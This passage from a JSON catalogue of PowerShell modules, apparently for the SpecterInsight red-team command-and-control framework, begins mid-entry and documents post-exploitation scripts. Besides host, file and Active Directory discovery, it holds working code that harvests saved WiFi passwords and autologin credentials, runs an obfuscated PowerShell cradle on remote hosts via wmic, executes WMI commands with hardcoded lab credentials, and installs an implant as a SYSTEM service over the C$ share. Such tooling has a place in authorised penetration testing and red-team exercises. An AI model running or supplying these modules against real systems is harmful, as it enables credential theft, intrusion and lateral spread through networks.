     \"fec0:0:0:ffff::3%1\"\r\n    ],\r\n    \"DhcpServers\": [],\r\n    \"WinsServers\": [],\r\n    \"Gateways\": [],\r\n    \"Entries\": [\r\n      {\r\n        \"Address\": \"224.0.0.22\",\r\n        \"PhysicalAddress\": \"00-00-00-00-00-00\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"239.255.255.250\",\r\n        \"PhysicalAddress\": \"00-00-00-00-00-00\",\r\n        \"EntryType\": \"Static\"\r\n      }\r\n    ]\r\n  },\r\n  {\r\n    \"InterfaceIndex\": 3,\r\n    \"InterfaceName\": \"Bluetooth Network Connection\",\r\n    \"InterfaceDescription\": \"Bluetooth Device (Personal Area Network)\",\r\n    \"Status\": \"Down\",\r\n    \"InterfaceType\": \"Ethernet\",\r\n    \"InterfaceIPs\": [\r\n      {\r\n        \"IP\": \"fe80::94af:e0eb:a646:a008%3\",\r\n        \"Netmask\": \"0.0.0.0\"\r\n      },\r\n      {\r\n        \"IP\": \"169.254.160.8\",\r\n        \"Netmask\": \"255.255.0.0\"\r\n      }\r\n    ],\r\n    \"DnsServers\": [\r\n      \"fec0:0:0:ffff::1%1\",\r\n      \"fec0:0:0:ffff::2%1\",\r\n      \"fec0:0:0:ffff::3%1\"\r\n    ],\r\n    \"DhcpServers\": [],\r\n    \"WinsServers\": [],\r\n    \"Gateways\": [],\r\n    \"Entries\": [\r\n      {\r\n        \"Address\": \"224.0.0.22\",\r\n        \"PhysicalAddress\": \"01-00-5E-00-00-16\",\r\n        \"EntryType\": \"Static\"\r\n      }\r\n    ]\r\n  },\r\n  {\r\n    \"InterfaceIndex\": 5,\r\n    \"InterfaceName\": \"Ethernet0\",\r\n    \"InterfaceDescription\": \"Intel(R) 82574L Gigabit Network Connection\",\r\n    \"Status\": \"Up\",\r\n    \"InterfaceType\": \"Ethernet\",\r\n    \"InterfaceIPs\": [\r\n      {\r\n        \"IP\": \"fe80::4d29:4f21:ff5:d73f%5\",\r\n        \"Netmask\": \"0.0.0.0\"\r\n      },\r\n      {\r\n        \"IP\": \"192.168.1.103\",\r\n        \"Netmask\": \"255.255.255.0\"\r\n      }\r\n    ],\r\n    \"DnsServers\": [\r\n      \"192.168.1.2\"\r\n    ],\r\n    \"DhcpServers\": [\r\n      \"192.168.1.2\"\r\n    ],\r\n    \"WinsServers\": [\r\n      \"192.168.1.2\"\r\n    ],\r\n    \"Gateways\": [\r\n      \"192.168.1.1\"\r\n    ],\r\n    \"Entries\": [\r\n      {\r\n        \"Address\": \"192.168.1.2\",\r\n        \"PhysicalAddress\": \"00-0C-29-24-31-7C\",\r\n        \"EntryType\": \"Dynamic\"\r\n      },\r\n      {\r\n        \"Address\": \"192.168.1.104\",\r\n        \"PhysicalAddress\": \"00-0C-29-76-5E-F8\",\r\n        \"EntryType\": \"Dynamic\"\r\n      },\r\n      {\r\n        \"Address\": \"192.168.1.255\",\r\n        \"PhysicalAddress\": \"FF-FF-FF-FF-FF-FF\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"224.0.0.22\",\r\n        \"PhysicalAddress\": \"01-00-5E-00-00-16\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"224.0.0.251\",\r\n        \"PhysicalAddress\": \"01-00-5E-00-00-FB\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"224.0.0.252\",\r\n        \"PhysicalAddress\": \"01-00-5E-00-00-FC\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"239.255.255.250\",\r\n        \"PhysicalAddress\": \"01-00-5E-7F-FF-FA\",\r\n        \"EntryType\": \"Static\"\r\n      },\r\n      {\r\n        \"Address\": \"255.255.255.255\",\r\n        \"PhysicalAddress\": \"FF-FF-FF-FF-FF-FF\",\r\n        \"EntryType\": \"Static\"\r\n      }\r\n    ]\r\n  }\r\n]\r\n```",
    "scriptBlock": "load recon;\r\n\r\nGet-Interfaces",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "network-discovery",
      "passive",
      "system-network-configuration-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "e78a44a9165b4482b72a52bc84c53fde",
    "name": "List Files via API",
    "description": "Lists files and folders in the specified directory.",
    "documentation": "# Overview\r\n\r\nThis script lists files and folders in the specified directory. The operator can optionally apply a wildcard filter and chose whether or not to recursively search through subdirectories.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Length\": 524288,\r\n    \"PSIsContainer\": false,\r\n    \"Extension\": \".sqlite\",\r\n    \"CreationTimeUtc\": \"2022-01-03T21:42:34.1395221Z\",\r\n    \"LastAccessTimeUtc\": \"2024-01-25T04:52:57.555101Z\",\r\n    \"LastWriteTimeUtc\": \"2024-01-25T04:52:57.555101Z\",\r\n    \"FullName\": \"C:\\\\Users\\\\helpdesk\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\96ihc82a.default-release\\\\cookies.sqlite\",\r\n    \"Session\": {\r\n      \"MachineId\": \"dfec7175a6a62757d83b93794df767d5acfadb82\",\r\n      \"SessionId\": \"324557e28ddd4ac89d0df41e9bb6a712\",\r\n      \"BuildId\": \"576c5025f1754fdabb6ff8e7d050caad\",\r\n      \"FQDN\": \"DESKTOP-LMCH70V\",\r\n      \"IP\": \"::ffff:192.168.1.101\",\r\n      \"OS\": \"Windows 10.0.19045\",\r\n      \"Username\": \"DESKTOP-LMCH70V\\\\helpdesk\",\r\n      \"PID\": 5652,\r\n      \"Path\": \"C:\\\\Users\\\\helpdesk\\\\Desktop\\\\Workspace\\\\576c5025f1754fdabb6ff8e7d050caad-csharp-load-module.exe\"\r\n    }\r\n  }\r\n]\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory=$True, HelpMessage=\"The path to a file or directory.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Path = 'C:\\Users\\',\r\n\r\n    [Parameter(Mandatory=$True, HelpMessage=\"True to recursively list files and folders in subdirectories.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [bool]$Recurse = $false,\r\n\r\n    [Parameter(Mandatory=$True, HelpMessage=\"A wildcard filter to identify which file system entries to select.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Filter = \"*\"\r\n)\r\n\r\n$entries = Get-ChildItem -Path $Path -Filter $Filter -Recurse:$Recurse -ErrorAction SilentlyContinue;\r\n$entries | Select Length,PSIsContainer,Extension,CreationTimeUtc,LastAccessTimeUtc,LastWriteTimeUtc,FullName | Sort-Object LastWriteTimeUtc -Descending",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "file-and-directory-discovery",
      "linux",
      "mac",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "0d7c5d8cd9314c789fcef2db3cda67fd",
    "name": "Get Computers in Active Directory",
    "description": "This script queries the local Active Directory instance for the FQDN and OS Version of each computer in Active Directory.",
    "documentation": "# Overview\r\n\r\nThis script leverages the built-in ManagementObjectSearcher class to query the Active Directory domain that the current workstation is a member of for all computers and pulls the following information:\r\n\r\n- Fully Qualified Domain Name\r\n- Operating System\r\n- Version\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nFQDN             OS                                      Version\r\n----             --                                      -------\r\nDC1.lab.net      Windows Server 2019 Standard Evaluation 10.0 (17763)\r\nWKST-001.lab.net Windows 10 Pro                          10.0 (19044)\r\nWKST-002.lab.net Windows 10 Pro                          10.0 (19044)\r\nWKST-003.lab.net Windows 10 Pro                          10.0 (19044)\r\n```",
    "scriptBlock": "load recon;\r\n\r\ncomputers",
    "version": 1,
    "isPremium": true,
    "labels": [
      "active",
      "active-directory",
      "discovery",
      "network-discovery",
      "remote-system-discovery"
    ],
    "enabled": true
  },
  {
    "identifier": "e1be6771f4154c48a2a0af57284a87ca",
    "name": "Lateral Movement with WMI and PowerShell Cradle via Commandline",
    "description": "Run a PowerShell cradle on a remote system using wmic.exe.",
    "documentation": "# Overview\r\n\r\nThis script leverages Windows Management Instrumentation (WMI) commandline tool, wmic.exe, to start a process on the operator specified system using username and password or impersonation. An obfuscated PowerShell cradle is executed as either the specified user. The $Target parameter can be either hostname, FQDN, or IP.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- Valid administrator credentials for the target systems.\r\n- WMI service must be running on the remote system.\r\n- WMI must be allowed through the firewall.\r\n\r\n# Example Output\r\n\r\n```\r\nExecuting (Win32_Process)->Create()\r\n\r\nMethod execution successful.\r\n\r\nOut Parameters:\r\ninstance of __PARAMETERS\r\n{\r\n\tProcessId = 1904;\r\n\tReturnValue = 0;\r\n};\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\n#Generate a new PowerShell cradle command\r\n$Command = payload -Build $Build -Kind 'ps_command';\r\n\r\n#Shell escape any embedded slashes\r\n$Command = $Command.Replace('\\', '\\\\');\r\n$Command = $Command.Replace('\"', '\\\"');\r\n\r\n#Execute command on remote system using WMI commandline executable\r\nif(![String]::IsNullOrEmpty($Username) -and $Password -ne $null) {\r\n    #Run with explicit credentials\r\n    wmic.exe /node:$Target /user:$Username /password:$Password process call create $Command;\r\n} else {\r\n    #Run with impersonation\r\n    wmic.exe /node:$Target process call create $Command;\r\n}",
    "version": 5,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "execution",
      "lateral-movement",
      "powershell",
      "windows",
      "windows-command-shell",
      "windows-management-instrumentation"
    ],
    "enabled": true
  },
  {
    "identifier": "3d9fd5526d644257801b1ddca9866ecf",
    "name": "Remote Command via WMI",
    "description": "The script will run a command on a remote system using the WMI API.",
    "documentation": "# Overview\r\n\r\nThis script leverages the Windows Management Instrumentation API to run a command on a remote system using either impersonation of the current user or explicit credentials.\r\n\r\nWMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access with the latter leveraging the Distributed Component Object Model (DCOM). Remote WMI over DCOM operates using port 135.\r\n\r\n# Dependencies\r\n\r\n* None\r\n\r\n# Employment Considerations\r\n\r\n* Impersonation requires that the current user have access to the remote system.\r\n* You will not receive any output from the executed command using this mechanism.\r\n\r\n# Example Text Output\r\n\r\nExample of successful execution.\r\n\r\n```\r\n__GENUS          : 2\r\n__CLASS          : __PARAMETERS\r\n__SUPERCLASS     :\r\n__DYNASTY        : __PARAMETERS\r\n__RELPATH        :\r\n__PROPERTY_COUNT : 2\r\n__DERIVATION     : {}\r\n__SERVER         :\r\n__NAMESPACE      :\r\n__PATH           :\r\nProcessId        : 2288\r\nReturnValue      : 0\r\nPSComputerName   :\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the command.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the command.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The command to run on the target system.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The command to run on the target system.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Command\r\n)\r\n\r\n#Execute command on remote system using WMI commandline executable\r\nif(![String]::IsNullOrEmpty($Username) -and $Password -ne $null) {\r\n    #Run with explicit credentials\r\n    $Username = \"administrator@lab.net\"\r\n    $Password = \"1qaz!QAZ\"\r\n    $SecurePassword = ConvertTo-SecureString -String $Password -AsPlainText -Force\r\n    $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $SecurePassword\r\n\r\n    Invoke-WmiMethod -Class \"WIN32_PROCESS\" -Name \"Create\" -ArgumentList $Command -ComputerName $Target -Credential $Credential\r\n} else {\r\n    #Run with impersonation\r\n    Invoke-WmiMethod -Class \"WIN32_PROCESS\" -Name \"Create\" -ArgumentList $Command -ComputerName $Target\r\n}",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "execution",
      "lateral-movement"
    ],
    "enabled": true
  },
  {
    "identifier": "3b6cffa7f58345a4a724df91409aaae8",
    "name": "Get Autologin Credentials",
    "description": "Retrieves a list of user autologins and sometimes the login password.",
    "documentation": "# Overview\r\n\r\nLooks for user accounts configured to automatically logon at boot. This can sometimes retrieve passwords for those users.\r\n\r\n# Example Output\r\n\r\nThis example shows output for VMWare Workstation autologins.\r\n\r\n```\r\nDefaultDomainName DefaultUserName\r\n----------------- ---------------\r\n                  helpdesk\r\n```\r\n\r\n# Example Output\r\n\r\nThis example shows output for a local user autologin.\r\n\r\n```\r\nDefaultDomainName DefaultUserName DefaultPassword\r\n----------------- --------------- ---------------\r\n                  helpdesk        12qwaszx\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nGet-AutologinCredentials",
    "version": 2,
    "isPremium": true,
    "labels": [
      "credential-harvesting",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "28fad83094d14feea633180e9ebd0f86",
    "name": "Get Local Group Information via API",
    "description": "Displays information about local groups including group name and members.",
    "documentation": "# Overview\r\n\r\nDisplays information about local groups including group name and members.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nComputerName GroupName                           GroupComment                                                                                                                                                                                                   Members\r\n------------ ---------                           ------------                                                                                                                                                                                                   -------\r\nlocalhost    Access Control Assistance Operators Members of this group can remotely query authorization attributes and permissions for resources on this computer.                                                                                              {}\r\nlocalhost    Administrators                      Administrators have complete and unrestricted access to the computer/domain                                                                                                                                    {@{Sid=S-1-5-21-1570311002-106167381-3150605685-500; Class=User; User=Administrator; Domain=WKST-001}, @{Sid=S-1-5-21-1570311002-106167381-3150605685-1001; Class=User; User=helpdesk; Domain=WKST-001}, @{Sid=S-1-5-21-2167680254-1194456608-1029354720-512; Class=Group; User=Domain Admins; Domain=LAB}}\r\nlocalhost    Backup Operators                    Backup Operators can override security restrictions for the sole purpose of backing up or restoring files                                                                                                      {}\r\nlocalhost    Cryptographic Operators             Members are authorized to perform cryptographic operations.                                                                                                                                                    {}\r\nlocalhost    Device Owners                       Members of this group can change system-wide settings.                                                                                                                                                         {}\r\nlocalhost    Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects on this machine.                                                                                                                       {}\r\nlocalhost    Event Log Readers                   Members of this group can read event logs from local machine                                                                                                                                                   {}\r\nlocalhost    Guests                              Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted                                                                                 {@{Sid=S-1-5-21-1570311002-106167381-3150605685-501; Class=User; User=Guest; Domain=WKST-001}}\r\nlocalhost    Hyper-V Administrators              Members of this group have complete and unrestricted access to all features of Hyper-V.                                                                                                                        {}\r\nlocalhost    IIS_IUSRS                           Built-in group used by Internet Information Services.                                                                                                                                                          {@{Sid=S-1-5-17; Class=WellKnownGroup; User=IUSR; Domain=NT AUTHORITY}}\r\nlocalhost    Network Configuration Operators     Members in this group can have some administrative privileges to manage configuration of networking features                                                                                                   {}\r\nlocalhost    Performance Log Users               Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer                                       {}\r\nlocalhost    Performance Monitor Users           Members of this group can access performance counter data locally and remotely                                                                                                                                 {}\r\nlocalhost    Power Users                         Power Users are included for backwards compatibility and possess limited administrative powers                                                                                                                 {}\r\nlocalhost    Remote Desktop Users                Members in this group are granted the right to logon remotely                                                                                                                                                  {}\r\nlocalhost    Remote Management Users             Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. {}\r\nlocalhost    Replicator                          Supports file replication in a domain                                                                                                                                                                          {}\r\nlocalhost    System Managed Accounts Group       Members of this group are managed by the system.                                                                                                                                                               {@{Sid=S-1-5-21-1570311002-106167381-3150605685-503; Class=User; User=DefaultAccount; Domain=WKST-001}}\r\nlocalhost    Users                               Users are prevented from making accidental or intentional system-wide changes and can run most applications                                                                                                    {@{Sid=S-1-5-4; Class=WellKnownGroup; User=INTERACTIVE; Domain=NT AUTHORITY}, @{Sid=S-1-5-11; Class=WellKnownGroup; User=Authenticated Users; Domain=NT AUTHORITY}, @{Sid=S-1-5-21-2167680254-1194456608-1029354720-513; Class=Group; User=Domain Users; Domain=LAB}}\r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n[\r\n  {\r\n    \"ComputerName\": \"localhost\",\r\n    \"GroupName\": \"Access Control Assistance Operators\",\r\n    \"GroupComment\": \"Members of this group can remotely query authorization attributes and permissions for resources on this computer.\",\r\n    \"Members\": []\r\n  },\r\n  {\r\n    \"ComputerName\": \"localhost\",\r\n    \"GroupName\": \"Administrators\",\r\n    \"GroupComment\": \"Administrators have complete and unrestricted access to the computer/domain\",\r\n    \"Members\": [\r\n      {\r\n        \"Sid\": \"S-1-5-21-1570311002-106167381-3150605685-500\",\r\n        \"Class\": \"User\",\r\n        \"User\": \"Administrator\",\r\n        \"Domain\": \"WKST-001\"\r\n      },\r\n      {\r\n        \"Sid\": \"S-1-5-21-1570311002-106167381-3150605685-1001\",\r\n        \"Class\": \"User\",\r\n        \"User\": \"helpdesk\",\r\n        \"Domain\": \"WKST-001\"\r\n      },\r\n      {\r\n        \"Sid\": \"S-1-5-21-2167680254-1194456608-1029354720-512\",\r\n        \"Class\": \"Group\",\r\n        \"User\": \"Domain Admins\",\r\n        \"Domain\": \"LAB\"\r\n      }\r\n    ]\r\n  }\r\n]\r\n```",
    "scriptBlock": "load recon;\r\n\r\nGet-LocalGroups",
    "version": 1,
    "isPremium": true,
    "labels": [
      "account-discovery",
      "api",
      "discovery",
      "host-discovery"
    ],
    "enabled": true
  },
  {
    "identifier": "f8206df7115a448082a914c1f2142d89",
    "name": "Get WiFi Passwords Commandline",
    "description": "Harvest saved WiFi passwords.",
    "documentation": "# Overview\r\n\r\nRuns several netsh commands and parses output to extract WiFi passwords.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating System\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nProfile      Password\r\n------------ --------\r\nLaQuinta     0y^Q6l6XLZmg\r\nZMR WiFi     Ls08q2n@m85M\r\nFlyFi        58v0ENw&wHNi\r\n```\r\n\r\n# References\r\n\r\n* https://www.infosecmatter.com/powershell-commands-for-pentesters/",
    "scriptBlock": "$strings = (netsh wlan show profiles) | Select-String \"\\:(.+)$\";\r\nforeach($string in $strings) {\r\n    $name=$string.Matches.Groups[1].Value.Trim();\r\n    \r\n    $details = netsh wlan show profile name=\"$name\" key=clear | Select-String \"Key Content\\W+\\:(.+)$\";\r\n\r\n    if($details.Matches -ne $null) {\r\n        $password = $details.Matches[0].Groups[1].Value.Trim();\r\n    } else {\r\n        $password = \"\";\r\n    }\r\n\r\n    [PSCustomObject]@{\r\n        Profile=$name;\r\n        Password=$password;\r\n    }\r\n}",
    "version": 2,
    "isPremium": true,
    "labels": [
      "collection",
      "command-line",
      "credential-harvesting",
      "passive",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "b0e972a962fb42aaa2f9e0c32a240bf7",
    "name": "Lateral Movement Using Service Control Manager and Custom Binary (PSExec)",
    "description": "This script loads a SpecterInsight implant onto the remote system by installing a custom service binary that reflectively loads a Specter.",
    "documentation": "# Overview\r\n\r\nThis script leverages the Service Control Manager API to create and execute a remote service on the operator specified system using username and password. The custom service binary is run under the NT AUTHORITY\\SYSTEM account. The $Hostname parameter can be either hostname, FQDN, or IP.\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Dependencies\r\n\r\n- common\r\n- lateral\r\n\r\n# Pre-Requisites\r\n\r\n- Valid credentials for the target systems.\r\n- Service Control Manager\r\n- Firewall permissions to establish RPC connections\r\n- Server Service\r\n- Administrative Shares enabled\r\n- Firewall permissions allowing SMB connections",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build,\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The folder where the service directory will be created.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The folder where the service directory will be created.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Directory = \"C:\\Program Files\\\",\r\n\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory = $true, HelpMessage = \"The type of payload to drop.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory = $true, HelpMessage = \"The type of payload to drop.\")]\r\n    [ValidateSet(\"csharp_service_load_module\", \"csharp_service_powershell_host\")]\r\n    [string]$Payload = \"csharp_service_load_module\"\r\n)\r\n\r\nload common;\r\nload lateral;\r\n\r\n#Generate a new PowerShell cradle command\r\n$contents = payload -Build $Build -Kind $Payload;\r\n$config = payload -Build $Build -Kind 'csharp_config';\r\n\r\n#Get the filename of the payload\r\n$assembly = [System.Reflection.Assembly]::Load($contents);\r\n$filename = $assembly.GetName();\r\n$serviceName = $filename.Name + \"Svc\";\r\n\r\n#Define the remote paths\r\n$sharePath = \"\\\\$Target\\C`$\";\r\n$uncRootPath = [System.IO.Path]::Combine([System.IO.Path]::Combine($sharePath, $Directory.Replace(\"C:\\\", \"\")), $filename.Name);\r\n$uncBinaryPath = [System.IO.Path]::Combine($uncRootPath, $filename.Name + \".exe\");\r\n$localRootPath = [System.IO.Path]::Combine($Directory, $filename.Name);\r\n$localBinaryPath = [System.IO.Path]::Combine($localRootPath, $filename.Name + \".exe\");\r\n\r\n#Copy the payload to the remote system\r\ntry {\r\n    if([string]::IsNullOrEmpty($Username)) {\r\n        [void][System.IO.Directory]::CreateDirectory($uncRootPath);\r\n        [System.IO.File]::WriteAllBytes($uncBinaryPath, $contents);\r\n        [System.IO.File]::WriteAllText($uncBinaryPath + \".config\", $config);\r\n\r\n        #Create the service\r\n        Create-Service -ComputerName $Target -ServiceName $serviceName -Path $localBinaryPath -NoStart:$false;\r\n    } else {\r\n        $credentials = New-Object System.Net.NetworkCredential($Username, $Password);\r\n        $share = [common.IO.TemporaryNetworkShare]::Map($sharePath, $credentials);\r\n        try {\r\n            [void][System.IO.Directory]::CreateDirectory($uncRootPath);\r\n            [System.IO.File]::WriteAllBytes($uncBinaryPath, $contents);\r\n            [System.IO.File]::WriteAllText($uncBinaryPath + \".config\", $config);\r\n        } finally {\r\n            $share.Dispose();\r\n        }\r\n\r\n        #Create the service\r\n        Create-Service -ComputerName $Target -ServiceName $serviceName -Path $localBinaryPath -Username $Username -Password $Password -NoStart:$false;\r\n    }\r\n    $success = $true;\r\n} catch {\r\n    $success = $false;\r\n    throw;\r\n}\r\n\r\nNew-Object psobject -Property @{\r\n    Lateral = New-Object psobject -Property @{\r\n        Method = \"System Sevice\";\r\n        Path = $localBinaryPath;\r\n        ServiceName = $serviceName;\r\n        Payload = $Payload;\r\n        System = $Target;\r\n        Username = $Username;\r\n        Success = $success;\r\n    };\r\n};",
    "version": 21,
    "isPremium": true,
    "labels": [
      "api",
      "create-or-modify-system-process",
      "lateral-movement",
      "service-execution",
      "system-services",
      "valid-accounts",
      "windows",
      "windows-service"
    ],
    "enabled": true
  }
]